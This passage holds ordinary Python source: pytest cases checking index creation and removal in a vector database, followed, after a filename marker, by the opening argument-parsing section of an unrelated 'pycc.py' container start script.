@pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
method: create indexes by `index`, and then drop it, assert there is one index left
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create indexes by `index`, and then drop it during inserting entities, make sure async insert
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create indexes by `index`, and then drop it during searching, make sure async search
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test index still existed after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index can still build if not finished before server restart
method: create index by `index`, and then restart server, assert server is indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip(reason="Repeat with test_index_field_name_not_existed")
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
"""
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
"""
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_collection_not_existed(self, connect):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index
expected: create index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "FLAT", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
create_target_index(indexs[-1], field_name)
assert index == indexs[-1]
# assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
metric_type=metric_type, search_params=search_param)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index
expected: return code not equals to 0, create index failed
"""
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
"""
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add entities in it
expected: return code equals to 0
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_existed(self, connect):
"""
target: test drop index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_create(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self, connect, collection):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
params, _ = gen_search_vectors_params(binary_field_name, default_binary_entities, default_top_k, nq,
search_params=search_param, metric_type="JACCARD")
logging.getLogger().info(params)
res = connect.search(binary_collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
***************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
expected: return code 0, and index instructure
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
expected: return code 0, and index instructure
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection, create partition and add entities in it,
create index on collection, call drop collection index
expected: return code 0, and default index param
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
logging.getLogger().info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
logging.getLogger().info("In callback check search result")
logging.getLogger().info(res)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, default_index, _async=True)
connect.drop_collection(collection)
with pytest.raises(Exception, match=f'DescribeIndex failed: collection {collection} not found'):
connect.describe_index(collection, "")
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
|
pycc.py
|
#!/usr/bin/env python
"""Python Capability Container start script"""
__author__ = 'Adam R. Smith, Michael Meisinger'
# NOTE: Imports here must be controlled before gevent monkey patching
import argparse
import ast
from copy import deepcopy
from multiprocessing import Process, Event, current_process
import os
import signal
import sys
import traceback
from uuid import uuid4
# WARNING - DO NOT IMPORT GEVENT OR PYON HERE. IMPORTS **MUST** BE DONE IN THE main()
# DUE TO DAEMONIZATION.
#
# SEE: http://groups.google.com/group/gevent/browse_thread/thread/6223805ffcd5be22?pli=1
from putil.script_util import parse_args
log = None
version = "3.2" # TODO: extract version info from the code (tag/commit)
description = '''
SciON Capability Container v%s
''' % version
child_procs = [] # List of child processes to notify on terminate
childproc_go = None # Event that starts child processes (so that main process can complete initialization first)
# See below __main__ for STEP 1
# PYCC STEP 2
def entry():
"""
Parses arguments and daemonizes process if requested
"""
# NOTE: Resist the temptation to add other parameters here! Most container config options
# should be in the config file (pyon.yml), which can also be specified on the command-line via the extra args
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-c', '--config', type=str, help='Additional config files to load or dict config content', default=[])
parser.add_argument('-D', '--config_from_directory', action='store_true')
parser.add_argument('-d', '--daemon', action='store_true')
parser.add_argument('-fc', '--force_clean', action='store_true', help='Force clean system datastores before starting the container')
parser.add_argument('-bc', '--broker_clean', action='store_true', help='Force clean broker of queues/exchanges belonging to sysname')
parser.add_argument('-i', '--immediate', action='store_true', help='Exits the container if the only procs started were of immediate type')
parser.add_argument('-l', '--logcfg', type=str, help='Logging config file or config dict content')
parser.add_argument('-mp', '--multiproc', type=str, help='Start n containers total in separate processes')
parser.add_argument('-mx', '--mx', action='store_true', help='Start admin Web UI')
parser.add_argument('-n', '--noshell', action='store_true', help="Do not start a shell")
parser.add_argument('-o', '--nomanhole', action='store_true', help="Do not start remote-able manhole shell")
parser.add_argument('-p', '--pidfile', type=str, help='PID file to use when --daemon specified. Defaults to cc-<rand>.pid')
parser.add_argument('-r', '--rel', type=str, help='Deploy file to launch')
parser.add_argument('-ra', '--relall', action='store_true', help='Launch deploy file on all child processes')
parser.add_argument('-s', '--sysname', type=str, help='System name')
